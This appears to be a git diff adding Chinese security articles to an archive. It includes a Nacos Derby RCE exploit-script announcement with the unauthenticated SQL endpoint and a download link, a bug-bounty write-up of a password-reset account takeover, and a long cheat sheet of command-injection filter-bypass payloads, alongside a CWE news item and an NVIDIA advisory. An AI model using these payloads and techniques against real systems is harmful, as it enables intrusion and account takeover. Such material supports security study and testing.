diff --git a/data.json b/data.json index c0ff964d..65165960 100644 --- a/data.json +++ b/data.json @@ -430,5 +430,13 @@ "https://mp.weixin.qq.com/s?__biz=Mzg4MjQ4MjM4OA==&mid=2247521681&idx=1&sn=51efa515b14c56d1eaaf8c64eeaa48b8": "网安周讯 | 间谍利用监控系统漏洞,试图窃取我国国家秘密(十一月第4期)", "https://mp.weixin.qq.com/s?__biz=MzkwNjY1Mzc0Nw==&mid=2247486468&idx=1&sn=86051d4ce2ed3ebd7b3e40c346699628": "漏洞就是黄金", "https://mp.weixin.qq.com/s?__biz=MzkxNjY1MjY3OQ==&mid=2247487950&idx=1&sn=32c9207fd0007458094dc29cbb18b191": "九思OA dl.jsp 任意文件读取漏洞复现及POC", - "https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489336&idx=1&sn=751a6198afda40267aabb99699f930d2": "宏景eHR uploadLogo.do 任意文件上传漏洞" + "https://mp.weixin.qq.com/s?__biz=MzkzMTcwMTg1Mg==&mid=2247489336&idx=1&sn=751a6198afda40267aabb99699f930d2": "宏景eHR uploadLogo.do 任意文件上传漏洞", + "https://mp.weixin.qq.com/s?__biz=MzU3NzY3MzYzMw==&mid=2247498660&idx=1&sn=2ae1b79058ee95e417df3e8431156bfb": "Nacos Derby命令执行漏洞利用脚本(11月22日更新)", + "https://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066127&idx=4&sn=1c50f0f483942910d6d8ae2633bccc0b": "【安全圈】麻省理工发布2024年最危险的漏洞TOP 25", + "https://mp.weixin.qq.com/s?__biz=Mzg2NDY2MTQ1OQ==&mid=2247523053&idx=1&sn=dd5d54765d1a5481c3116c6d66a97fed": "命令执行漏洞绕过方法总结", + "https://mp.weixin.qq.com/s?__biz=MzkxNTIwNTkyNg==&mid=2247551673&idx=1&sn=8abf20688cefbe86bf1f6b3c7174d82e": "“赏金猎人”自述,漏洞挖掘错误示范", + "https://mp.weixin.qq.com/s?__biz=Mzg2ODYxMzY3OQ==&mid=2247517238&idx=1&sn=fae22190772c451f5618b4e3c8d0ca5a": "Src漏洞挖掘-拼出来的严重漏洞", + "https://mp.weixin.qq.com/s?__biz=MzkzNzY5OTg2Ng==&mid=2247500272&idx=2&sn=ea13352d874cc569065c249b3d247830": "【漏洞通告】NVIDIA Base Command Manager身份验证缺失漏洞(CVE-2024-0138)", + "https://mp.weixin.qq.com/s?__biz=MzkyNTY3Nzc3Mg==&mid=2247487737&idx=1&sn=4f638de3392347a0fcee5155e547abab": "躺平预告!漏洞挖掘的赚钱姿势", + "https://mp.weixin.qq.com/s?__biz=MzI4ODQzMzk3MA==&mid=2247489331&idx=1&sn=300968c94c2ac2b251996282239a53c8": "美国陆军网络司令部采取措施提高网络部队战备水平" } \ No newline at end of file diff --git a/doc/Nacos Derby命令执行漏洞利用脚本(11月22日更新).md b/doc/Nacos Derby命令执行漏洞利用脚本(11月22日更新).md new file mode 100644 index 00000000..0a14d2ac --- /dev/null +++ b/doc/Nacos Derby命令执行漏洞利用脚本(11月22日更新).md @@ -0,0 +1,66 @@ +# Nacos Derby命令执行漏洞利用脚本(11月22日更新) +XiaomingX 网络安全者 2024-11-22 16:01 + +=================================== +免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。 +0x01 工具介绍 +Nacos Derby命令执行漏洞利用脚本,默认使用User-Agent绕过漏洞进行利用。 +Nacos 是一款用于服务注册、发现和配置管理的开源平台。在其早期版本(≤2.4.0-BETA)中,Nacos 默认集成了 Apache Derby 作为嵌入式数据库。由于 Derby 数据库默认未设置访问控制,攻击者可以未经授权地访问特定接口,执行任意 SQL 语句,最终导致远程命令执行漏洞。 +0x02 安装与使用 + +漏洞原理: +1. 未授权访问: 在默认配置下,Nacos 的 Derby 数据库接口未设置访问控制,允许任何人访问。 + +1. SQL 注入: 攻击者通过特定的 HTTP 请求,向 Nacos 的 Derby 接口发送恶意 SQL 查询。例如,访问以下 URL: +``` +http://:8848/nacos/v1/cs/ops/derby?sql=select * from users + +``` + + +这将返回用户表中的所有数据。 + +1. 远程命令执行: 更为严重的是,攻击者可以利用 Derby 的特定功能,通过 SQL 语句执行任意代码。例如,使用 CALL 语句加载远程的恶意 JAR 包,并执行其中的代码,从而在受害者服务器上执行任意命令。 + +修复措施: +- 升级 Nacos: 官方已在最新版本中修复了此漏洞,建议将 Nacos 升级至最新版本。 + +- 禁用 Derby 接口: 如果不使用嵌入式数据库,建议禁用 Derby 接口,防止未经授权的访问。 + +- 启用身份验证: 配置 Nacos 的身份验证机制,确保只有授权用户才能访问相关接口。 + +此漏洞的利用可能导致数据泄露、服务中断,甚至服务器被完全控制,危害极大。因此,强烈建议受影响的用户尽快采取上述措施进行防护。 +## POC/EXP - 使用方法 +``` +nacos_derby_rce.py [-h] -u URL [-a TOKEN] +``` + +**** +**0x03 下载链接** + +1、通过阅读原文,到项目地址下载 + +2、 +网盘下载 +链接: +https://pan.quark.cn/s/277a5414fe16 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccy4GnbA3TEdicu93dQibFIT2oAl5QXvLicnqzM8SusKyhmOFe3CQKapyl4u4eNknxibv3dES3icqoLdjKw/640?wx_fmt=png&from=appmsg "") + + + + + + +**·****今 日 推 荐** +**·** + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/0JJXjA8siccy4GnbA3TEdicu93dQibFIT2oobgOibTw1uhLCpBqFwCKZlsfGogKXxelGIgvwicOgdxz0KDoFf4RDM8Q/640?wx_fmt=png&from=appmsg "") + + + + + + diff --git a/doc/Src漏洞挖掘-拼出来的严重漏洞.md b/doc/Src漏洞挖掘-拼出来的严重漏洞.md new file mode 100644 index 00000000..31711118 --- /dev/null +++ b/doc/Src漏洞挖掘-拼出来的严重漏洞.md @@ -0,0 +1,107 @@ +# Src漏洞挖掘-拼出来的严重漏洞 + Z2O安全攻防 2024-11-22 09:42 + +**No.0** + +**前言** + + +挖洞就是要多思考,我是爱思考的张三,给大家分享一个严重漏洞的挖掘思路。 + +,我是 + +**No.2** + +**实战过程** + + +1、A站点重置密码处需要提供账号即学号,以及姓名,接下来需要信息收集到姓名,学号,以及后面会用到的手机号。 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQyFsDSsVmCFwhDbDhWJOfQyia4qLgyWp9ibluiaiaqWODnWg84sibmkKUp3Q/640?wx_fmt=png&from=appmsg "") + + +2、主站SSO重置密码输入工号即学号,通过信息收集到证书站学号 + +语法,site:xxx.edu.cn filetype:xls 学号 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQemg8Erias00tg4LsPBytuvC06Jy1ZNsK6XPQM6f7MUGIYs3CISFiaicEA/640?wx_fmt=png&from=appmsg "") + + +3、出现姓名以及中间四位数脱敏手机号,188xxxxx888 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQ9tGc6m3DRBJXucAaWdC0EHBqn096lqs4AYhVXt8iciaFSwibxicxibkvXRQ/640?wx_fmt=png&from=appmsg "") + + +4、通过第一步学号+姓名校验后,此处需要输入完整手机号通过校验才会下一步 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQFk7OibZbwKKDI5TmZQvYe0nF1S48sA9ZLTRZibk42b85FT1DrFdWZIfA/640?wx_fmt=png&from=appmsg "") + + +5、爆破手机号,根据返回包长度判断,获取完整手机号 + + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQqDBRptMfy9RM8yfGibY5AT2r4rEIEBeBN5CmsYtdoa2iboAXdoZKXRiaw/640?wx_fmt=png&from=appmsg "") + + +6、输入学号,姓名,手机号 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQCN9n8pfCXUHTnenzO6FK0KYmabuVD7WVQFeelsWFjocv1s4TRiaicPHQ/640?wx_fmt=png&from=appmsg "") + + +7、设置新密码,无需旧密码验证,抓包发现X-Runtime疑似短信验证码 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQhOcrPb71kgjxQoQXVSQaPsgNKrRibX0kyUa8RLJW5ARziciby8rhicQN5w/640?wx_fmt=png&from=appmsg "") + + +8、输入X-Runtime的值107574即验证码,通过校验成功重置密码 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQS8KtPn7HuzabnlDho2sVp0FzQEHC3cSVvoIx2fRTyAeYpEIWE9oh0w/640?wx_fmt=png&from=appmsg "") + + +9、此账号密码可登录SSO + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQL8aOhKrn4wZicbsuyiayTibeh6XSWDtPFhhWh8pF5n9RjyeB0GNy5PgHA/640?wx_fmt=png&from=appmsg "") + + +10、成功进入后台 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQficS8V4om9gcsdicVeblIHtU5KLgickxqYBEQPmGldwCEsfZ1WEl40crA/640?wx_fmt=png&from=appmsg "") + + +11、漏洞评级:严重 + + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ELQKhUzr34zmDcwnpIworOWwhI9rZ9AQ9tzrOgzIXibhI3t2m6VTDh6yhh0HjnpqiajkdaANRH85NicmqtQKpYMBg/640?wx_fmt=png&from=appmsg "") + + + +one more thing + + +建立了一个src专项圈子,内容包含src漏洞知识库、src挖掘技巧、src视频教程等,一起学习赚赏金技巧,以及专属微信群一起挖洞 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuaehOF5tHCCpjqsaibBZvicC9icONEE7ZAStTkNtl3l9JIzB97TZeiafOSbnkusSfliaROBLIdeLK4xupQ/640?wx_fmt=jpeg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuaehOF5tHCCpjqsaibBZvicC9nurT4YsPibj0DdE4EVHnQJKMDfUKNmzjCqKDejOJRj71srsNkXXGCGw/640?wx_fmt=jpeg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuaehOF5tHCCpjqsaibBZvicC9k2aael12glC8KLjlDxwSD2ZJNG5r6Bo68hmiaDfCIibEPytBj1MnQILA/640?wx_fmt=jpeg "") + + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuaehOF5tHCCpjqsaibBZvicC9vfPsfTmZkUjeuJ5v9Znumokj7aV7UjzuHzteeP9ORtRbuuvcpNTkTQ/640?wx_fmt=jpeg "") + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/h8P1KUHOKuaehOF5tHCCpjqsaibBZvicC9D7xNU1xOW7U54MZfJZjeibBzXMNPhvV3eD7k82ibicXsHNRzU9vYjFbNw/640?wx_fmt=jpeg "") + + + + diff --git a/doc/“赏金猎人”自述,漏洞挖掘错误示范.md b/doc/“赏金猎人”自述,漏洞挖掘错误示范.md new file mode 100644 index 00000000..36267972 --- /dev/null +++ b/doc/“赏金猎人”自述,漏洞挖掘错误示范.md @@ -0,0 +1,5 @@ +# “赏金猎人”自述,漏洞挖掘错误示范 + 蚁景网络安全 2024-11-22 09:44 + +![](https://mmbiz.qpic.cn/mmbiz_png/5znJiaZxqldwlXCGSb3P2O5HFoLaJZunx7KVSZpdPBUibcSwEr5SBrkLKGibNzyQF1tVgmiclMRxuja95rhlmbRiciaA/640?wx_fmt=png&from=appmsg "") + diff --git a/doc/【安全圈】麻省理工发布2024年最危险的漏洞TOP 25.md b/doc/【安全圈】麻省理工发布2024年最危险的漏洞TOP 25.md new file mode 100644 index 00000000..8131e926 --- /dev/null +++ b/doc/【安全圈】麻省理工发布2024年最危险的漏洞TOP 25.md @@ -0,0 +1,80 @@ +# 【安全圈】麻省理工发布2024年最危险的漏洞TOP 25 + 安全圈 2024-11-22 11:04 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/aBHpjnrGylgOvEXHviaXu1fO2nLov9bZ055v7s8F6w1DD1I0bx2h3zaOx0Mibd5CngBwwj2nTeEbupw7xpBsx27Q/640?wx_fmt=other&from=appmsg&tp=webp&wxfrom=5&wx_lazy=1&wx_co=1 "") + + +**关键词** + + + +安全漏洞 + + +麻省理工学院(MITRE)收集、分析了2023年6月至2024年6月之间披露3.1万个漏洞,并发布了2024年最危险的软件漏洞TOP 25名单。 + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/aBHpjnrGylgKZbN7RO3qZzvWgQTAPicibNJI5mZA2NBMpXsJK9vTgSia2l2KdFwUEmXGZkmC8ZtYo608vaibiaw4k4Q/640?wx_fmt=jpeg&from=appmsg "") +该名单可以帮助企业评估企业基础设施的安全情况,MITRE表示:“如果企业的基础设施涉及相关的漏洞弱点,就可能受到未知黑客的攻击,包括全完接管系统、窃取数据或系统无法运行。” + +MITRE对3.1万个漏洞进行了详细地分析,并根据每个漏洞的严重性和利用频率进行评分,其中会重点关注添加到CISA已知利用漏洞(KEV)目录中的安全漏洞。MITRE强调,强烈建议审查列表上的漏洞类型,并指导其软件安全策略,防止软件生命周期中可能出现的严重漏洞。 + +以下是2024年CWE前25个最危险的软件漏洞列表: + +![](https://mmbiz.qpic.cn/sz_mmbiz_jpg/aBHpjnrGylgKZbN7RO3qZzvWgQTAPicibNx9brDc3KfnwHuu2476B4iblG3giaAic7sVJZicvdnibZ8djictm8Y4C2tQ0A/640?wx_fmt=jpeg&from=appmsg "") + + + +  END   + + +阅读推荐 + + +[【安全圈】Ubuntu系统软件中的5个漏洞潜藏了10年才被发现](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066112&idx=1&sn=00fc32fb2126236a289beba3ec9b7b29&chksm=f36e7d00c419f41616a3b529fd231f5c9cb584fc1c962df2286ebe434d3081d23b39cd91ade2&scene=21#wechat_redirect) + + + +[【安全圈】菜鸟黑客们开始抄红队人员的作业?](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066112&idx=2&sn=09bb634b924e35eaff76039d01f35970&chksm=f36e7d00c419f416e741d513ef48b749921a32dfc81493b21049b6c190854ffaefabe6efe559&scene=21#wechat_redirect) + + + +[【安全圈】网络钓鱼警报:通过 DocuSign 冒充政府的攻击激增](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066112&idx=3&sn=dce35e4585bab3391e375bef7d60a394&chksm=f36e7d00c419f416a58fffe5ab88a99af8ab606dac885e999152a64678434bf34b1ca933c490&scene=21#wechat_redirect) + + + +[【安全圈】朝鲜黑客创建经过安全验证的恶意软件攻击macOS系统](http://mp.weixin.qq.com/s?__biz=MzIzMzE4NDU1OQ==&mid=2652066112&idx=4&sn=5b9242cdb5d2263f743eae03dcbe82d0&chksm=f36e7d00c419f41651171aad9c644ce17a7b061075eb069737ae2c80576eb4d36c322befe171&scene=21#wechat_redirect) + + + + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "") + + + +![](https://mmbiz.qpic.cn/mmbiz_png/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEDQIyPYpjfp0XDaaKjeaU6YdFae1iagIvFmFb4djeiahnUy2jBnxkMbaw/640?wx_fmt=png "") + +**安全圈** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCEft6M27yliapIdNjlcdMaZ4UR4XxnQprGlCg8NH2Hz5Oib5aPIOiaqUicDQ/640?wx_fmt=gif "") + + +←扫码关注我们 + +**网罗圈内热点 专注网络安全** + +**实时资讯一手掌握!** + + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "") + +**好看你就分享 有用就点个赞** + +**支持「****安全圈」就点个三连吧!** + +![](https://mmbiz.qpic.cn/mmbiz_gif/aBHpjnrGylgeVsVlL5y1RPJfUdozNyCE3vpzhuku5s1qibibQjHnY68iciaIGB4zYw1Zbl05GQ3H4hadeLdBpQ9wEA/640?wx_fmt=gif "") + + + + + + diff --git a/doc/【漏洞通告】NVIDIA Base Command Manager身份验证缺失漏洞(CVE-2024-0138).md b/doc/【漏洞通告】NVIDIA Base Command Manager身份验证缺失漏洞(CVE-2024-0138).md new file mode 100644 index 00000000..f5577a27 --- /dev/null +++ b/doc/【漏洞通告】NVIDIA Base Command Manager身份验证缺失漏洞(CVE-2024-0138).md @@ -0,0 +1,48 @@ +# 【漏洞通告】NVIDIA Base Command Manager身份验证缺失漏洞(CVE-2024-0138) + 启明星辰安全简讯 2024-11-22 08:48 + +**一、漏洞****概述** +
漏洞名称
NVIDIA +  Base Command Manager身份验证缺失漏洞
CVE   ID
CVE-2024-0138
漏洞类型
身份验证缺失
发现时间
2024-11-22
漏洞评分
9.8
漏洞等级
高危
攻击向量
网络
所需权限
利用难度
用户交互
PoC/EXP
未公开
在野利用
未发现
+NVIDIA Base Command Manager 是 NVIDIA 提供的一种管理工具,专为加速计算和 AI 工作负载的开发和部署设计,CMDaemon 组件是该管理工具中的核心后台服务,负责协调系统资源、管理任务调度,以及提供与外部工具和用户接口的通信支持。 + +2024年11月22日,启明星辰集团VSRC监测到NVIDIA Base Command Manager中存在身份验证缺失漏洞(CVE-2024-0138),该漏洞的CVSS评分为9.8。 + +NVIDIA Base Command Manager 版本10.24.09的 CMDaemon 组件中存在身份验证缺失漏洞,未经身份验证的攻击者可能通过向未受保护的接口/功能发送恶意请求或命令,从而在系统上执行任意代码、导致拒绝服务、权限提升、信息泄露或数据篡改等。 + +## 二、影响范围 + +NVIDIA Base Command Manager 10.24.09 + +## 三、安全措施 +### 3.1 升级版本 + +目前该漏洞已经修复,受影响用户可升级到NVIDIA Base +Command Manager 10.24.09a或更高版本。 + +下载链接: + +https://www.nvidia.com/en-us/ +### 3.2 临时措施 + +暂无。 +### 3.3 通用建议 + +定期更新系统补丁,减少系统漏洞,提升服务器的安全性。 + +加强系统和网络的访问控制,修改防火墙策略,关闭非必要的应用端口或服务,减少将危险服务(如SSH、RDP等)暴露到公网,减少攻击面。 + +使用企业级安全产品,提升企业的网络安全性能。 + +加强系统用户和权限管理,启用多因素认证机制和最小权限原则,用户和软件权限应保持在最低限度。 + +启用强密码策略并设置为定期修改。 +### 3.4 参考链接 + +https://nvidia.custhelp.com/app/answers/detail/a_id/5595 + +https://nvd.nist.gov/vuln/detail/CVE-2024-0138 + + + + diff --git a/doc/命令执行漏洞绕过方法总结.md b/doc/命令执行漏洞绕过方法总结.md new file mode 100644 index 00000000..3e337334 --- /dev/null +++ b/doc/命令执行漏洞绕过方法总结.md @@ -0,0 +1,321 @@ +# 命令执行漏洞绕过方法总结 +原创 LULU 红队蓝军 2024-11-22 10:01 + +# 命令执行漏洞绕过方法总结 +## 操作系统管道符 +### Windows系统管道符 +``` +|  :直接执行后面的语句,|前面的命令结果作为后面命令的参数 +|| :前面的命令执行成功,则后面的命令不会执行;前面的命令执行失败,则后面的命令执行 +&  :前面和后面命令都要执行,无论前面真假。注意:使用的时候要把&进行URL编码为%26才能正常执行cmd=%26cat /flag +&& :如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令 + +``` +### linux系统管道符 +``` +|、||、&、&&这四种管道符都存在且用法和Windows系统下一样 + +;作用和&一样,只是不用%26 + +``` +## 绕过: +### 空格绕过 + +**1、${IFS}** + +${IFS} 是一个环境变量,代表内部字段分隔符(Internal Field Separator)。在大多数情况下,它的默认值是空格、制表符(tab)和换行符 + +示例: +``` +1、cat${IFS}flag.txt +2、ls${IFS}-la + +``` + +**2、利用大括号** +``` +{cat,flag.txt} + +``` + +**3、%09绕过** (php环境) + +%09 是一个表示制表符(Tab 键)的 ASCII 码,可以用于空格过滤绕过。 +``` +cat%09flag.txt  等同于 catflag.txt + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBNvM0V1gbBy7hI4VCib4h1cP5UrRbibDJFM1vFs0r1iavjujjqaJMWibTicA/640?wx_fmt=png&from=appmsg "") + +### bin绕过 +``` +/tmp/../bin/whoami + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBPPibzxfk5DmibHibrY6TnGjacwq6z5jc6Dh0I8x5RHLdJSLoeL3O4Nic1Q/640?wx_fmt=png&from=appmsg "") + + +**4、重定向** + +**重定向字符 <** :用于将文件的内容作为输入提供给命令 + +示例: + +cat  flag.txt + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBHcnpKFxG9o1QwA6U5A7tp3icjQpTCOR6DwicVmZBcRnUgfyicdk34k8lw/640?wx_fmt=png&from=appmsg "") + + +cat**:用于打开文件并同时进行读取和写入 + +cat<>flag.txt + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBFicj714bGgj4Kw5Sugp5xvMBCmJ8xU9JvWUPN7chX4Xj6O9QY4gFb5g/640?wx_fmt=png&from=appmsg "") +### bash变量绕过 +``` +c=ami;who$_  :$_代表前面一个命令的结果。 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBeofplY2bLCdM82oJBSm9oxSRT6D87OziaZvH0SaBZt3mYpCbZfjBBdQ/640?wx_fmt=png&from=appmsg "") + +### 黑名单绕过 + +**1、base64编码** + +将 cat flag 进行编码 + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBP6NTQRDybibnZXmO1yaR5LbhcicIh38nZppS07IrIP1MliccQjZAaSIqQ/640?wx_fmt=png&from=appmsg "") + +管道符|把前面指令执行的结果,变成后面指令的参数 +``` +`echo "Y2F0IGZsYWc="|base64 -d` + $(echo Y2F0IGZsYWc= | base64 -d) +echo Y2F0IGZsYWc= | base64 -d | bash + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBkjL0AAcicGO6X1lsfQicrrVUxYz5fD1Rqs1YGOp7Lc3D77Dq9N8Cu4tA/640?wx_fmt=png&from=appmsg "") + +同理base32编码也可 + +**2、拼接** + +利用变量$ +``` +a=c; b=at; c=fl; d=ag; $a$b $c$d +$a$b 最终会被替换为 cat,而 $c$d 最终会被替换为 flag + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBNvM0V1gbBy7hI4VCib4h1cP5UrRbibDJFM1vFs0r1iavjujjqaJMWibTicA/640?wx_fmt=png&from=appmsg "") + +**3、反斜杠** +``` +c\at fl\ag  + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBtovEIvP5lg4U5jeHkRbxm0ctqVfgaNDcqa1NFicIUDTPsm1nFgezQLg/640?wx_fmt=png&from=appmsg "") + + +4、单 双引号 +``` +c""at fl''ag +"ca"'t'"" 'fl'"ag" + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBXF8duSnx0JFlDDibnfARV0dp3u79WQibcQ1dIOo2NQIHWI7ibCj2kiaxsA/640?wx_fmt=png&from=appmsg "") +### 读取文件命令绕过 + +常见的将cat进行过滤 +``` +1、将cat进行编码 + +``` +``` +2、tac:反向显示,从最后一行开始往前显示 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBPPibzxfk5DmibHibrY6TnGjacwq6z5jc6Dh0I8x5RHLdJSLoeL3O4Nic1Q/640?wx_fmt=png&from=appmsg "") +``` +3、more:一页一页显示档案内容 +less:与more类似 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBb2kp74GttupCRmxBRof7J2utrM2m97UjHgvSUfO05SucHSLlAiabyqQ/640?wx_fmt=png&from=appmsg "") + +``` +4、tail 查看末尾几行 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianB9jg18ibvTN0VibzlUtlBtXbYgibIMiczRjX4ckyDh3Ea2RJhHv4LJVIhibw/640?wx_fmt=png&from=appmsg "") +``` +5、nl 显示的时候,顺便输出行号 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBTEqOfx3kb8dChUOSODdwnPicZIhkjhMLRzqibjSFtRibOw9Xo1hXAjO3Q/640?wx_fmt=png&from=appmsg "") +``` +6、od :以二进制方式读取档案内容 +    -A d:指定输出地址的格式为十进制。 +    -c:以字符形式输出内容。 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBqo7jGfCG4jXsFD1kEiaEUl8GhLr260KIKrMYb4LzGOF2piaXcKMJPbkw/640?wx_fmt=png&from=appmsg "") + +``` +7、sort:主要用于排序文件  + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBzjiciaZAADUwe5M9IZgicicwrRJVd4ZUJia4ufN3jPYjS9FUe7umM7vsypg/640?wx_fmt=png&from=appmsg "") + +``` +8、uniq :报告或删除文件中重复的行也可以查看 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianB1A3zs73INlDdWQKg1GHxpjcsYibmRfjO03FJ6qbJeZ4eib0icPb5zMyug/640?wx_fmt=png&from=appmsg "") + +``` +9、file -f:报错出具体内容 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBYria4vPBmg6NIhzEFA0caX28FeA4JdMrWeaNP68Bpia65gIwq4l9lmHQ/640?wx_fmt=png&from=appmsg "") +``` +10、strings :相当于cat + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBLSCwh1NnkWvDGcCDsfm5hNIibPtcmVIFWdnzkHsBIwY15AyKMDl7ibtA/640?wx_fmt=png&from=appmsg "") + +``` +10、使用编辑器 vi  vim  nano也可查看 + +``` +### 通配符绕过 +``` +/???/?[a][t] ?''?''?''?'' +/???/?at flag +/???/?at ???? +/???/?[a]''[t] ?''?''?''?''  + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBsibHibozLBibnIeh51dOPPE8h24EdnXtLplst6vh0puHZ2dqnbTlBDRsA/640?wx_fmt=png&from=appmsg "") + +### 长度绕过 + +**1、Linux中的>符号和>>符号** +``` +通过>创建文件,并将命令执行结果写入文件会覆盖掉文件原本的内容 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianB7FJia4J4k32GadEqaCEk4faCKJMgt4fUFrqbdz82gB9G7dFKKAibPHLg/640?wx_fmt=png&from=appmsg "") + +``` +>>用来追加文件内容 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBXZttrr7wdiaHEzxl6moiccGZM6v6AIY0jJMBdloLHh36JAMrA2tlX3lA/640?wx_fmt=png&from=appmsg "") + +**运用** +``` +echo "ca\\">cmd :创建文件,并写入内容 +echo "t\\">>cmd :追加文件内容 +echo " fl\\">>cmd :追加 +echo "ag">>cmd :追加 +cat cmd +sh cmd :sh命令是shell命令语言解释器,执行命令从标准输入读取或从一个文件中读取 + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBd4tOLmNQ3OH3niajysaElNONoLB0MKHROX3VplSAm70WXTS76psOibcw/640?wx_fmt=png&from=appmsg "") + + +**2、利用ls-t和>绕过** +``` +ls -t命令:按时间顺序,后创建的排在前面,由近及远排序。 + +``` +``` +#>"ag" +#>" fl\\" +#>"t\\" +#>"ca\\" +#ls -t  +#ls -t > zian +#sh zian + +``` + +![](https://mmbiz.qpic.cn/sz_mmbiz_png/ibZ6uZjjH3v5elNmt2sdpVHoGK3ia4TianBcL86SJVuUhKoLPzGia6yWialAibicXLBXAmwy1WBexhsB8QQKWSFDVAvYA/640?wx_fmt=png&from=appmsg "") + + 